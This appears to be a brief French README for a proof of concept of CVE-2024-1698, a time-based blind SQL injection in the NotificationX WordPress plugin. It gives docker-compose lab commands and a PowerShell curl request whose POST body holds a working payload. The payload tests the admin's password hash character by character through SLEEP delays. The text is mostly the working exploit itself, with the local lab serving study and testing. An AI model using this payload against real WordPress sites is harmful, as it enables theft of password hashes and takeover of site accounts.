
Preuve de concept pour CVE-2024-1698, une vulnérabilité d'injection SQL aveugle dans le plugin WordPress NotificationX, permettant l'extraction de données basée sur le temps depuis la base de données.
docker-compose up --build
docker-compose down
Measure-Command {
curl.exe http://localhost/wp-json/notificationx/v1/analytics `
-Method Post `
-Body 'nx_id=1337&type=clicks`=IF(ASCII(SUBSTRING((select user_pass from wp_users where id=1),1,1))=36,SLEEP(10),null)-- -'
}